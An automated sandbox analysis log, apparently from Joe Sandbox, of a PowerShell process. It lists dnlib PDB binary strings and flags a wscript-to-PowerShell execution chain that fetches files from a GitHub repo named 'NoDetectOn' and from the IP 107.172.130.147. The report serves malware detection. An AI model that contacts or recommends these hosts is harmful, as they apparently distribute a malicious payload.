Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2420242779.00000207432A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ows\System.Core.pdb$:IYN source: powershell.exe, 00000004.00000002.2418527103.00000207430E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.2427497580.00007FFE168A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000004.00000002.2420242779.00000207432BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ystem.pdb source: powershell.exe, 00000004.00000002.2418527103.00000207430E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: n.pdbQ source: powershell.exe, 00000004.00000002.2420242779.00000207432BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2427497580.00007FFE168A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /500/RSSTT.txt HTTP/1.1Host: 107.172.130.147Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /500/RSSTT.txt HTTP/1.1Host: 107.172.130.147Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 03:23:20 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25Content-Length: 301Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 37 32 2e 31 33 30 2e 31 34 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 107.172.130.147 Port 80</address></body></html>
Source: powershell.exe, 00000004.00000002.2386759505.000002072B44F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.147
Source: powershell.exe, 00000004.00000002.2386759505.000002072B44F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.147/500/RSSTT.txt
Source: powershell.exe, 00000004.00000002.2420242779.00000207432D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
